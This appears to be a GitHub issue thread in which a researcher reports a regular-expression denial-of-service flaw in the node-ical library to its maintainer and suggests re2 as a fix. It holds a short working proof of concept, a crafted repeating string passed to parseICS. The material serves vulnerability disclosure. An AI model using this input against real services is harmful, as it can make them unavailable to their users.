ReDoS in node-ical

[yetingli]

Hey Jens,

Recently I found a potential ReDoS vulnerability inside node-ical and provided some proper examples. You can access the vulnerability details at huntr. Please feel free to get in touch if there are any more issues.

Best regards, Yeting

[jens-maus]

Please make this security report public on huntr rather than keeping it private.

[yetingli]

Sorry, I don't have permission to make this security report public on huntr. Only after this report is confirmed can it be made public. You can use your GitHub account to log in and access.

[jens-maus]

What‘s wrong in posting this information here directly on GitHub?

[yetingli]

Others suggested that I should do a responsible disclosure, that is, I should not open an issue until the report has been validated. Once the report is made public, but not repaired in time, it may pose a certain risk.

[jens-maus]

No problem here with that. node-ical is no missing critical application and I am not a security nerd either. Simply post it and I will see that I will try to review it ASAP.

[yetingli]

Thank you for your understanding! I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability. It allows cause a denial of service when calling parseICS.

Proof of Concept

var nodeIcal = require("node-ical")
var str= "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";
nodeIcal.parseICS(str);

[yetingli]

A relatively simple patch, you can use the package re2 (https://www.npmjs.com/package/re2). I hope this can help you.